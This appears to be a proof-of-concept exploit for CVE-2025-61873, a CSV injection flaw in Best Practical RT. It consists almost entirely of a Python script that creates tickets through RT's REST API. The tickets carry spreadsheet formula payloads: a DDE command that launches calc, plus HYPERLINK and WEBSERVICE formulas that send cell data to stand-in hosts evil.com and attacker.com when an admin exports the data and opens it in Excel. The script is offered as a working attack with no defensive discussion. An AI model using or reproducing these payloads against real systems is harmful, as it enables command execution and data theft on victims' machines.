CVE-2025-61873: Best Practical RT CSV注入漏洞

# CVE-2025-61873 CSV Injection PoC # Attacker's ticket creation with malicious formula import requests # Target RT instance target_url = "http://rt.example.com/REST/1.0/ticket/new" # Malicious payload for CSV injection # When exported as TSV and opened in Excel, this becomes a formula payload = { "subject": "Test Ticket =cmd|' /C calc'!A0", "queue": "General", "owner": "root", "requestor": "[email protected]", "description": "Description field with formula =HYPERLINK(\"http://evil.com/steal?data=\"&A1)" } # Create the malicious ticket via REST API response = requests.post(target_url, data=payload, auth=('attacker_user', 'password')) print(f"Ticket created: {response.status_code}") # Alternative: Data exfiltration formula data_exfil_payload = { "subject": "Urgent Issue =WEBSERVICE(\"http://attacker.com/log?data=\"&ENCODEURL(A1))" } requests.post(target_url, data=data_exfil_payload, auth=('attacker_user', 'password')) print("Malicious ticket created. When admin exports TSV and opens in Excel, formula will execute.")